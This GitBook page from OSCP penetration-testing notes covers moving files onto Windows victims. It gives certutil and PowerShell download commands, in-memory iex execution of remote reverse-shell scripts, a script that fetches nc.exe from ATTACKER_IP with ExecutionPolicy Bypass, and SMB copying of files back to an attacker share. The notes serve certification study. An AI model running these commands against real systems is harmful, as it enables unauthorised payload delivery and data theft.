OSCP Notes
  • Introduction
  • Port Scanning
  • Nmap Port Scanning
  • Nmap Scripts
  • Services Enumeration
    • SMB Enumeration (Port 139, 445)
    • SNMP Enumeraion (Port 161)
    • NFS Enumeration (Port 111, 2049)
    • SMTP Enumeration (Port 25)
    • DNS Enumeration (Port 53)
    • POP3 (Port 110, 25*)
    • MySQL (Port 3306)
    • Oracle (Port 1521)
    • MsSQL (Port 1433)
  • Web / HTTP
    • Web Scanning
    • CMS
    • Directory Fuzzing
    • File Upload
      • Bypass file upload filtering
      • Bruteforcing extensions
      • WebDAV
    • Bruteforce Authentication
    • LFI and RFI
      • Interesting Files for LFI
      • Null Byte Injection
      • PHP Wrappers
    • ShellShock
    • Post Requests
  • password attacks
    • Brute-force service password
    • Cracking Password
    • Custom Worldlist
  • Exploitaion
    • Searchsploit
    • Compiling the Exploit
  • shell
    • Bind and Reverse shell
    • Upgrading shell
    • msfvenom
  • Linux Post Exploitation
    • Linux Manual Exploitation
    • Linux post exploitation scripts
    • Kernel Exploitation
  • windows post exploitation
    • General
    • Manual Exploitaion
    • Dumping the sam file
    • SUDO SU
    • Automated enumeration script
    • Windows Exploit Suggester
  • file transfer
    • General
    • Linux
    • Windows
  • cheatsheets
    • Command injection Cheatsheet
    • Find Command Cheatsheet
    • Netcat
    • SQL Injection Bypass
    • CheckList
    • XSS Payload
Powered by GitBook
On this page
  • Certutils
  • IWR (Invoke Web Request)
  • System.Net.WebClient
  • IEX
  • Internet Explorer Basic Parsing
  • Escaping shell
  • Script
  • SMB
  1. file transfer

Windows

Certutils

certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe

IWR (Invoke Web Request) 

powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe "

System.Net.WebClient

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')

IEX

Instead of downloading to disk, the payload can instead be executed in memory, using Invoke-Expression, or the alias iex.

powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')

IEX also accepts pipeline input.

powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex

Internet Explorer Basic Parsing

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

This can be bypassed using the parameter -UseBasicParsing.

powershell Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex

Escaping shell

If you ever encounter error regarding slash while supplying any of above command Incorrect syntax near '/'. Use / to escape it -

powershell.exe IEX (New-ObjectNet.WebClient).DownloadString(\"http://10.10.16.26:8000/rev.ps1\")

Script

  • if above command get blocked we can make ps script that will download our file

  • run following commands in victim :

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[http://ATTACKER_IP/nc.exe"](http://ATTACKER_IP/nc.exe) >> wget.ps1
echo $file = "nc.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1

Execution of script

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

SMB

Attacker -

smbserver.py gabbar /tmp

Target -

dir \\Attacker_ip\gabbar
# will list out all files

copy \\10.10.14.109\gabbar\winPEASx86.exe .
# To download from our machine

copy user.txt \\10.10.14.109\gabbar
# To upload file to our box
PreviousLinuxNextCommand injection Cheatsheet

Last updated 3 years ago